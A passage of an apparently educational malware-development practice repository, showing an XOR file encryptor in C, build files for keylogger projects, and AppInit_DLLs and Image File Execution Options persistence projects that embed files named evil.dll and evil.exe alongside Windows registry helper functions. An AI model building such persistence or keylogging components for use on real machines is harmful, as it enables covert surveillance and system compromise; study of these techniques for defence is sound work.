6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "simple-encryption", "simple-encryption\simple-encryption.vcxproj", "{0306B084-8237-4C80-B697-1C8C1222E120}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {0306B084-8237-4C80-B697-1C8C1222E120}.Debug|x64.ActiveCfg = Debug|x64
17 | {0306B084-8237-4C80-B697-1C8C1222E120}.Debug|x86.ActiveCfg = Debug|Win32
18 | {0306B084-8237-4C80-B697-1C8C1222E120}.Release|x64.ActiveCfg = Release|x64
19 | {0306B084-8237-4C80-B697-1C8C1222E120}.Release|x64.Build.0 = Release|x64
20 | {0306B084-8237-4C80-B697-1C8C1222E120}.Release|x86.ActiveCfg = Release|Win32
21 | {0306B084-8237-4C80-B697-1C8C1222E120}.Release|x86.Build.0 = Release|Win32
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | GlobalSection(ExtensibilityGlobals) = postSolution
27 | SolutionGuid = {9374940C-EA6A-4C2B-BB73-6FCE4F21E5D4}
28 | EndGlobalSection
29 | EndGlobal
30 |
--------------------------------------------------------------------------------
/simple-encryption/simple-encryption/simple-encryption.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma warning(disable : 4996)
5 |
6 | // XOR Cipher
7 |
/*
 * Prints the one-line usage banner, with str substituted as the program name.
 * (The argument list after "%s" is empty in this listing; whether that is
 * the original text or an extraction artefact cannot be told from here.)
 */
void printf_usage(char* str)
{
    const char* programName = str;
    printf(" [+] Usage: %s \n", programName);
}
12 |
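/*
 * Returns 1 when key is a non-empty string consisting only of ASCII digits
 * '0'..'9', and 0 otherwise (NULL and "" included).
 *
 * Rejecting the empty string is deliberate: the original accepted it, and
 * atoi("") yields 0, a key that leaves every byte unchanged while still
 * reporting a successful "encryption".
 */
int isValidXorKey(const char* key)
{
    if (key == NULL || *key == '\0')
        return 0;

    for (const char* p = key; *p != '\0'; p++) {
        if (*p < '0' || *p > '9')
            return 0;
    }
    return 1;
}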
22 |
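/*
 * Returns the size in bytes of the file named by filename.
 *
 * Exits the process with code 2 when the file cannot be opened or when
 * fseek/ftell fail (the original ignored both return values and would have
 * returned (unsigned long long)-1 on an ftell failure). ftell yields a long,
 * which is 32-bit under MSVC, so sizes of 2 GiB and above are not
 * representable here.
 */
unsigned long long getSizeOfFile(char* filename)
{
    FILE* fptr = fopen(filename, "rb");
    if (fptr == NULL) {
        printf(" [-] Error! Opening file \'%s\' for calculating size.\n", filename); exit(2);
    }

    long endPos = -1L;
    if (fseek(fptr, 0L, SEEK_END) != 0 || (endPos = ftell(fptr)) < 0L) {
        fclose(fptr);
        printf(" [-] Error! Calculating size of file \'%s\'.\n", filename); exit(2);
    }

    fclose(fptr);
    return (unsigned long long)endPos;
}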
36 |
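/*
 * Reads exactly filesize bytes of filename into buffer; the caller must have
 * sized buffer to at least filesize bytes.
 *
 * No return value: exits with 2 when the file cannot be opened and with 3
 * when fewer than filesize bytes are read, when buffer is NULL with a
 * non-zero filesize, or when filesize does not fit in size_t (fread's
 * count type, which is 32-bit on an x86 build and would silently truncate).
 */
void readFileBinary(char* buffer, char* filename, unsigned long long filesize)
{
    FILE* fptr = fopen(filename, "rb");
    if (fptr == NULL) {
        printf(" [-] Error! Opening file \'%s\' for reading.\n", filename); exit(2);
    }

    if ((buffer == NULL && filesize > 0) || filesize > (size_t)-1) {
        fclose(fptr);
        printf(" [-] Error! Reading file\n"); exit(3);
    }

    size_t numberOfBytes = fread(buffer, 1, (size_t)filesize, fptr);
    fclose(fptr);   // close before any exit so the error path holds no handle
    if (numberOfBytes != filesize) {
        printf(" [-] Error! Reading file\n"); exit(3);
    }
}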
53 |
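/*
 * Writes filesize bytes from buffer to filename, creating or truncating it.
 *
 * No return value: exits with 2 when the file cannot be opened for writing
 * and with 4 when fewer than filesize bytes are written, when buffer is NULL
 * with a non-zero filesize, or when filesize does not fit in size_t (fwrite's
 * count type, 32-bit on an x86 build).
 */
void writeFileBinary(char* buffer, char* filename, unsigned long long filesize)
{
    FILE* fptr = fopen(filename, "wb");
    if (fptr == NULL) {
        printf(" [-] Error! Opening file \'%s\' for writing.\n", filename); exit(2);
    }

    if ((buffer == NULL && filesize > 0) || filesize > (size_t)-1) {
        fclose(fptr);
        printf(" [-] Error! Writing file\n"); exit(4);
    }

    size_t numberOfBytes = fwrite(buffer, 1, (size_t)filesize, fptr);
    // fclose flushes; a flush failure would also surface as a short write
    // from the caller's point of view, so fold it into the same check.
    int closeStatus = fclose(fptr);
    if (numberOfBytes != filesize || closeStatus != 0) {
        printf(" [-] Error! Writing file\n"); exit(4);
    }
}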
70 |
/*
 * XORs each of the first filesize bytes of buffer with xorKey in place.
 * Only the low byte of xorKey can affect a char, and applying the function
 * twice with the same key restores the original bytes. With filesize 0 the
 * buffer is never touched.
 */
void bufferEncoding(char* buffer, int xorKey, unsigned long long filesize)
{
    char* cursor = buffer;
    unsigned long long remaining = filesize;
    char keyByte = (char)xorKey;

    while (remaining-- > 0) {
        *cursor ^= keyByte;
        cursor++;
    }
}
77 |
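/*
 * Entry point. Argument order as read from argv below:
 *   argv[1] input file, argv[2] numeric XOR key, argv[3] output file
 * (the usage banner in printf_usage appears to have lost its argument list).
 *
 * Reads the whole input file, XORs every byte with the key and writes the
 * result to the output file. Exit codes: 5 bad arguments or key, 2 open
 * failure, 3 read or allocation failure, 4 write failure, 0 success.
 *
 * Command-line strings are used through pointers into argv rather than being
 * strcpy'd into 50-byte stack buffers: the original did the latter, which
 * overflows the stack on any path or program name of 50+ characters.
 */
int main(int argc, char const* argv[])
{
    // Program name = basename of argv[0] on a Windows path ('\\' separator)
    const char* progName = (argc > 0 && argv[0] != NULL) ? argv[0] : "";
    const char* lastToken = strrchr(progName, '\\');
    if (lastToken != NULL) progName = lastToken + 1;

    // Check arguments
    if (argc != 4) {
        printf_usage((char*)progName); exit(5);
    }

    const char* fileIn = argv[1];
    const char* fileOut = argv[3];
    int xorKey = 0;

    // Parsing arguments
    if (isValidXorKey(argv[2])) {
        xorKey = atoi(argv[2]);
    }
    else {
        printf(" [-] Error! Invalid key. The encrypt key must be numberic!\n"); exit(5);
    }

    // Obtain file size
    unsigned long long sizeOfFile = getSizeOfFile((char*)fileIn);

    // malloc(0) may legitimately return NULL, which the original reported as
    // an allocation failure; allocate at least one byte so an empty input
    // round-trips to an empty output.
    char* buffer = (char*)malloc(sizeOfFile > 0 ? (size_t)sizeOfFile : 1);
    if (buffer == NULL) {
        printf(" [-] Error! Memory not allocated.\n"); exit(3);
    }

    // Read, XOR in place, write
    readFileBinary(buffer, (char*)fileIn, sizeOfFile);
    bufferEncoding(buffer, xorKey, sizeOfFile);
    writeFileBinary(buffer, (char*)fileOut, sizeOfFile);

    free(buffer);
    return 0;
}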
--------------------------------------------------------------------------------
/simple-encryption/simple-encryption/simple-encryption.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/simple-encryption/simple-encryption/simple-encryption.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-keylogger/hooking-keylogger/hooking-keylogger.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/simple-keylogger/hooking-keylogger/hooking-keylogger.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-keylogger/polling-keylogger/polling-keylogger.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/simple-keylogger/polling-keylogger/polling-keylogger.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-keylogger/release/x64/hooking-keylogger.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-keylogger/release/x64/hooking-keylogger.zip
--------------------------------------------------------------------------------
/simple-keylogger/release/x64/polling-keylogger.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-keylogger/release/x64/polling-keylogger.zip
--------------------------------------------------------------------------------
/simple-keylogger/simple-keylogger.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "polling-keylogger", "polling-keylogger\polling-keylogger.vcxproj", "{2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "hooking-keylogger", "hooking-keylogger\hooking-keylogger.vcxproj", "{A6F84978-B82E-447D-AE53-81153A32D80F}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|x64 = Debug|x64
13 | Debug|x86 = Debug|x86
14 | Release|x64 = Release|x64
15 | Release|x86 = Release|x86
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}.Debug|x64.ActiveCfg = Debug|x64
19 | {2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}.Debug|x86.ActiveCfg = Debug|Win32
20 | {2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}.Release|x64.ActiveCfg = Release|x64
21 | {2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}.Release|x64.Build.0 = Release|x64
22 | {2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}.Release|x86.ActiveCfg = Release|Win32
23 | {2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}.Release|x86.Build.0 = Release|Win32
24 | {A6F84978-B82E-447D-AE53-81153A32D80F}.Debug|x64.ActiveCfg = Debug|x64
25 | {A6F84978-B82E-447D-AE53-81153A32D80F}.Debug|x86.ActiveCfg = Debug|Win32
26 | {A6F84978-B82E-447D-AE53-81153A32D80F}.Release|x64.ActiveCfg = Release|x64
27 | {A6F84978-B82E-447D-AE53-81153A32D80F}.Release|x64.Build.0 = Release|x64
28 | {A6F84978-B82E-447D-AE53-81153A32D80F}.Release|x86.ActiveCfg = Release|Win32
29 | {A6F84978-B82E-447D-AE53-81153A32D80F}.Release|x86.Build.0 = Release|Win32
30 | EndGlobalSection
31 | GlobalSection(SolutionProperties) = preSolution
32 | HideSolutionNode = FALSE
33 | EndGlobalSection
34 | GlobalSection(ExtensibilityGlobals) = postSolution
35 | SolutionGuid = {2D1B326E-B37B-4CE1-AA01-B98BA2CBBB29}
36 | EndGlobalSection
37 | EndGlobal
38 |
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/appinit-dlls.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/appinit-dlls/appinit-dlls.aps
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/appinit-dlls.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.dll"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/appinit-dlls.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/appinit-dlls.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/bin/evil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/appinit-dlls/bin/evil.dll
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/reg/Windows.reg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/appinit-dlls/reg/Windows.reg
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/registry.c:
--------------------------------------------------------------------------------
1 | #include "registry.h"
2 |
3 | /*
4 | * Example usage:
5 | BOOL status;
6 | DWORD readData;
7 | PWCHAR readMessage = nullptr;
8 |
9 | status = CreateRegistryKey(HKEY_CURRENT_USER, "Aticleworld"); //create key
10 | if (status != TRUE) return FALSE;
11 |
12 | status = WriteDwordInRegistry(HKEY_CURRENT_USER, "Aticleworld","date",12082016); //write dword
13 | if (status != TRUE) return FALSE;
14 |
15 | status = readDwordValueRegistry(HKEY_CURRENT_USER, "Aticleworld", "date", &readData); //read dword
16 | if (status != TRUE) return FALSE;
17 | printf("%ld", readData);
18 |
19 | status = writeStringInRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", "Happy"); //write string
20 | if (status != TRUE) return FALSE;
21 |
22 | status = readUserInfoFromRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", &readMessage); //read string
23 | if (status != TRUE) return FALSE;
24 | if (readMessage != nullptr) {
25 | printf(" Message = %S\n", readMessage);
26 | free(readMessage);
27 | readMessage = nullptr;
28 | }
29 | */
30 |
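/*
 * Creates hKeyParent\subkey (or opens it when it already exists) and closes
 * the handle immediately. Returns TRUE on success, FALSE otherwise.
 *
 * The handle is never used after creation, so a narrower access mask than
 * KEY_ALL_ACCESS would satisfy least privilege; the mask is left as in the
 * original to keep behaviour identical under restrictive ACLs.
 */
BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey)
{
    DWORD dwDisposition; // REG_CREATED_NEW_KEY or REG_OPENED_EXISTING_KEY
    HKEY hKey;
    DWORD Ret;

    Ret = RegCreateKeyExW(hKeyParent, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
    if (Ret != ERROR_SUCCESS) {
        // Reg* functions return the Win32 error code directly and do not set
        // the thread's last-error value, so the original's GetLastError()
        // printed a stale code; report Ret itself.
        printf(" [-] Error Opening or Creating new key. Code = %lu\n", (unsigned long)Ret);
        return FALSE;
    }
    RegCloseKey(hKey);
    return TRUE;
}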
46 |
/*
 * Stores data as a REG_DWORD value named valueName under hKeyParent\subkey.
 * Returns TRUE when the key opened and the value was written, FALSE when the
 * key cannot be opened (missing or access denied) or RegSetValueExW fails.
 * The key is opened with KEY_WRITE only, the minimum needed to set a value.
 */
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data)
{
    HKEY hKey;
    BOOL written = FALSE;

    if (RegOpenKeyExW(hKeyParent, subkey, 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
        return FALSE;

    if (RegSetValueExW(hKey, valueName, 0, REG_DWORD, (LPBYTE)&data, sizeof(data)) == ERROR_SUCCESS)
        written = TRUE;

    // Single close path for both outcomes
    RegCloseKey(hKey);
    return written;
}
65 |
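/*
 * Store the NUL-terminated wide string `strData` as a REG_SZ value named
 * `valueName` under hKeyParent\subkey. The key must already exist.
 *
 * Returns TRUE when the value was written, FALSE if strData is NULL, the
 * key could not be opened, or the value could not be set.
 */
BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData)
{
    HKEY hKey;
    DWORD cbData;
    BOOL written;

    if (strData == NULL)
        return FALSE;

    /* REG_SZ data must include the terminating NUL, and the size is in bytes.
     * lstrlenW is used explicitly: plain lstrlen resolves to lstrlenA in a
     * non-UNICODE build and would miscount a wide string. */
    cbData = ((DWORD)lstrlenW(strData) + 1) * sizeof(WCHAR);

    if (RegOpenKeyExW(hKeyParent, subkey, 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
        return FALSE;

    written = (RegSetValueExW(hKey, valueName, 0, REG_SZ,
                              (LPBYTE)strData, cbData) == ERROR_SUCCESS);
    RegCloseKey(hKey);
    return written;
}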
82 |
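/*
 * Read the REG_DWORD value `valueName` from hKeyParent\subkey into *readData.
 *
 * Returns TRUE and stores the value on success. Returns FALSE, leaving
 * *readData untouched, when readData is NULL, the key cannot be opened, the
 * value is missing, or the stored value is not a 4-byte REG_DWORD.
 */
BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData)
{
    HKEY hKey = NULL;
    LONG status;
    DWORD value = 0;
    DWORD type = REG_NONE;
    DWORD size = sizeof(value); /* in: bytes available; out: bytes stored */

    if (readData == NULL)
        return FALSE;

    /* Only query rights are needed to read a value. */
    status = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_QUERY_VALUE, &hKey);
    if (status != ERROR_SUCCESS)
        return FALSE;

    status = RegQueryValueExW(hKey, valueName, NULL, &type, (LPBYTE)&value, &size);
    RegCloseKey(hKey);

    /* A failed query must not be reported as success, and anything that is
     * not exactly a DWORD (e.g. a REG_SZ or REG_BINARY value) is rejected so
     * it cannot be misread as a number. */
    if (status != ERROR_SUCCESS || type != REG_DWORD || size != sizeof(value))
        return FALSE;

    *readData = value;
    return TRUE;
}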
105 |
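/*
 * Read the string value `valueName` from hKeyParent\subkey into a newly
 * allocated, NUL-terminated wide-string buffer.
 *
 * On success returns TRUE and stores the buffer in *readData; the caller
 * owns it and must release it with free(). On failure returns FALSE and
 * sets *readData to NULL. Failure cases: readData is NULL, the key cannot
 * be opened, allocation fails, the value is missing, or its type is not
 * REG_SZ / REG_EXPAND_SZ.
 *
 * The buffer starts at TOTAL_BYTES_READ bytes and grows by at least
 * OFFSET_BYTES while RegQueryValueExW reports ERROR_MORE_DATA. One extra
 * WCHAR is always reserved so a terminator can be appended: string data
 * written by other programs is not guaranteed to be NUL-terminated.
 */
BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData)
{
    HKEY hKey = NULL;
    LONG status;
    DWORD type = REG_NONE;
    DWORD capacity = TOTAL_BYTES_READ; /* usable bytes in `buffer` */
    DWORD needed = 0;                  /* in/out byte count for RegQueryValueExW */
    DWORD grownCapacity;
    PWCHAR buffer;
    PWCHAR grown;

    if (readData == NULL)
        return FALSE;
    *readData = NULL;

    /* Open before allocating so a missing key does not cost a malloc/free. */
    status = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_QUERY_VALUE, &hKey);
    if (status != ERROR_SUCCESS)
        return FALSE;

    buffer = (PWCHAR)malloc(capacity + sizeof(WCHAR));
    if (buffer == NULL) {
        RegCloseKey(hKey);
        return FALSE;
    }

    for (;;) {
        needed = capacity;
        status = RegQueryValueExW(hKey, valueName, NULL, &type, (LPBYTE)buffer, &needed);
        if (status != ERROR_MORE_DATA)
            break;

        /* On ERROR_MORE_DATA `needed` holds the value's real size; grow to
         * at least that, and by OFFSET_BYTES at minimum. realloc's result is
         * kept separately so the old buffer is freed if it fails. */
        grownCapacity = capacity + OFFSET_BYTES;
        if (needed > grownCapacity)
            grownCapacity = needed;
        grown = (PWCHAR)realloc(buffer, grownCapacity + sizeof(WCHAR));
        if (grown == NULL) {
            free(buffer);
            RegCloseKey(hKey);
            return FALSE;
        }
        buffer = grown;
        capacity = grownCapacity;
    }
    RegCloseKey(hKey);

    if (status != ERROR_SUCCESS || (type != REG_SZ && type != REG_EXPAND_SZ)) {
        free(buffer);
        return FALSE;
    }

    /* `needed` <= capacity here, and the buffer has capacity + sizeof(WCHAR)
     * bytes, so the terminator index is always in bounds. */
    buffer[needed / sizeof(WCHAR)] = L'\0';
    *readData = buffer;
    return TRUE;
}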
140 |
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/registry.h:
--------------------------------------------------------------------------------
#pragma once
/* NOTE(review): the three include targets below were lost in this listing
 * (angle-bracket names stripped); registry.c uses the Win32 registry API
 * plus printf and malloc/realloc/free. */
#include
#include
#include
#pragma comment(lib, "AdvAPI32.Lib")

/* Initial buffer size, in bytes, that ReadStringFromRegistry allocates. */
#define TOTAL_BYTES_READ 1024
/* Growth step, in bytes, applied while RegQueryValueExW reports ERROR_MORE_DATA. */
#define OFFSET_BYTES 1024

/* Thin wrappers over the Win32 registry API. Every function returns TRUE on
 * success and FALSE on failure; `subkey` is a NUL-terminated wide key path
 * relative to hKeyParent, `valueName` a NUL-terminated wide value name. */

/* Create `subkey` under hKeyParent (non-volatile) or open it if it exists. */
BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
/* Write `data` as a REG_DWORD value; the key must already exist. */
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
/* Write the wide string `strData` (including its terminator) as a REG_SZ value. */
BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
/* Read a DWORD value into *readData. */
BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData);
/* Read a string value into a malloc'd buffer stored in *readData; the caller
 * must release it with free(). */
BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData);
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by appinit-dlls.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/bin/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/image-file-execution-options/bin/evil.exe
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/image-file-execution-options.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/image-file-execution-options/image-file-execution-options.aps
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/image-file-execution-options.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.exe"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/image-file-execution-options.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
